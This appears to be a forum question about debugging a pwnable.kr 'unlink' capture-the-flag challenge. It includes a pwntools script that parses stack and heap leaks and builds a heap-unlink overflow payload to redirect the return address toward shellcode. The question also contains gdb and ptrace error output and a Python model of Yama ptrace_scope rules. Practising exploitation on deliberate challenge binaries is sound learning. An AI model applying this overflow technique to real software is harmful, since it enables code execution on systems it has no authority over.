Is it possible to debug pwnable.kr challenges?
Over the past few days I have been trying to solve the "unlink" challenge on pwnable.kr, and I am struggling to attach a debugger, both remotely and locally on the server, using pwntools (code added below).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

exe = context.binary = ELF('unlink_local')
host = args.HOST or 'pwnable.kr'
port = int(args.PORT or 2222)
user = args.USER or 'unlink'
password = args.PASSWORD or 'guest'
remote_path = '/home/unlink/unlink'

# Connect to the remote SSH server
shell = None
if not args.LOCAL:
    shell = ssh(user, host, port, password)
    shell.set_working_directory(symlink=True)


def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)


def start_remote(argv=[], *a, **kw):
    '''Execute the target binary on the remote host'''
    if args.GDB:
        return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw)
    else:
        return shell.process([remote_path] + argv, *a, **kw)


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)


gdbscript = '''
tbreak main
continue
'''.format(**locals())

r = start()

stack_leak = r.recvline(keepends=False)
stack_leak = int(stack_leak.decode("latin-1").split(": ")[1], 16)
heap_leak = r.recvline(keepends=False)
heap_leak = int(heap_leak.decode("latin-1").split(": ")[1], 16)

ret_addr_on_stack = stack_leak + 0x28  # 0x28 is the offset between the leak and the return address location on
                                       # the stack (checked in gdb via running the program multiple times and checking the offset)
shellcode_location_on_heap = heap_leak + 0x50

"""
Payload layout (in this exact order)
"""
A_buf = b"A" * 8                           # A's buf variable (in the struct 'tagOBJ' in the source) overflow
B_prev_size = b"B" * 4                     # B's prev_size variable (in malloc internals) overflow
B_size = b"C" * 4                          # B's size variable (in malloc internals) overflow
B_fd = p32(ret_addr_on_stack - 0x4)        # B's fd pointer (in the struct 'tagOBJ') overflow
B_bk = p32(shellcode_location_on_heap)     # 0x080484eb # B's bk pointer (in the struct 'tagOBJ') overflow ----- shell() function address
B_buf = b"D" * 8                           # B's buf variable (in the struct 'tagOBJ') overflow
C_prev_size = b"E" * 4                     # B's prev_size variable (in malloc internals) overflow
C_size = b"F" * 4                          # B's size variable (in malloc internals) overflow
C_fd = b"PPPP"                             # C's fd pointer (in the struct 'tagOBJ') overflow ----- empty (doesn't point anywhere)
C_bk = b"LLLL"                             # C's bk pointer (in the struct 'tagOBJ') overflow ----- RET ADDRESS LOCATION ON STACK

payload = A_buf + B_prev_size + B_size + B_fd + B_bk + B_buf + C_prev_size + C_size + C_fd + C_bk

with open("inp", "wb") as f:
    f.write(payload)

r.sendlineafter(b'now that you have leaks, get shell!\n', payload)
r.interactive()
When I attach gdb remotely using pwntools, I get the following error message from the server:
[DEBUG] Received 0x8f bytes:
'/build/gdb-9un5Xp/gdb-7.11.1/gdb/gdbserver/regcache.c:264:\n'
'A problem internal to GDBserver has been detected.\n'
'Unknown register ymm0h requested\n'
Also, when I attach gdb locally on the server using pwntools and tmux (without tmux it cannot find a terminal to open gdb in, I don't know why), I get this error:
Attaching to program: /home/unlink/unlink, process 50201
Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.
/tmp/tal/50201: No such file or directory.
Breakpoint 1 at 0x804851e
(gdb)
The same error occurs when attaching to the process by pid without pwntools (via gdb -p {pid}).
I will point out that I tried running the program on my own computer (not on their server), and the heap layout is different (I think malloc aligns to 16 bytes instead of 4? Honestly, I don't know why it differs), so running locally does not work.
Please note that I realise this exploit does not work correctly; my problem is that I don't know how to debug it properly, so please avoid corrections to the exploit itself.
Hints would be appreciated :)
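The gdb failure quoted in the question points at /proc/sys/kernel/yama/ptrace_scope, uid matching and /etc/sysctl.d/10-ptrace.conf (the file in which Ubuntu sets scope 1). As an added illustration that is not part of the question or of pwntools, the following simplified Python model of the documented Yama rules predicts whether attaching by pid (`gdb -p PID`, what pwntools' gdb.attach does) or starting the target under gdb (PTRACE_TRACEME) is permitted and why; the Tracer/Tracee fields are assumed inputs and nothing here queries the kernel.

```python
"""Simplified model of Linux Yama ptrace_scope (added example, not kernel code):
predicts whether `gdb -p PID` (PTRACE_ATTACH) or spawning the target under
gdb/gdbserver (PTRACE_TRACEME) is permitted, and says why."""
from dataclasses import dataclass
from typing import Tuple


@dataclass
class Tracer:
    uid: int
    cap_sys_ptrace: bool = False   # e.g. root, or a debugger granted the capability


@dataclass
class Tracee:
    uid: int
    dumpable: bool = True               # cleared for set-uid/set-gid processes
    descendant_of_tracer: bool = False  # the tracer forked/exec'd the target
    ptracer_allowed: bool = False       # target called prctl(PR_SET_PTRACER, tracer pid)


def can_attach(scope: int, tracer: Tracer, tracee: Tracee) -> Tuple[bool, str]:
    """PTRACE_ATTACH decision: what `gdb -p PID` and gdb.attach() rely on."""
    if scope not in range(4):
        raise ValueError("ptrace_scope must be 0..3")
    if scope == 3:
        return False, "scope 3: attach is refused for everyone, capabilities included"
    if tracer.cap_sys_ptrace:
        return True, "CAP_SYS_PTRACE bypasses the uid, dumpable and ancestry checks"
    if scope == 2:
        return False, "scope 2: only CAP_SYS_PTRACE holders may attach"
    # Classic DAC rules, enforced at scope 0 and 1.
    if tracer.uid != tracee.uid:
        return False, f"uid mismatch: tracer {tracer.uid} vs target {tracee.uid}"
    if not tracee.dumpable:
        return False, "target is not dumpable (e.g. set-uid binary); same-uid attach refused"
    if scope == 1 and not (tracee.descendant_of_tracer or tracee.ptracer_allowed):
        return False, "scope 1: only descendants or PR_SET_PTRACER targets may be attached"
    return True, "attach permitted"


def can_traceme(scope: int, tracer: Tracer) -> Tuple[bool, str]:
    """PTRACE_TRACEME decision: what starting the target *under* gdb relies on."""
    if scope == 3:
        return False, "scope 3: TRACEME is refused too, so gdb cannot spawn the target"
    if scope == 2 and not tracer.cap_sys_ptrace:
        return False, "scope 2: the parent debugger needs CAP_SYS_PTRACE"
    return True, "spawning under the debugger is permitted"
```

At scope 1 a same-uid attach to a process that gdb did not start is refused while spawning under gdb still works, which is the difference between gdb -p and gdb.debug that the model makes explicit.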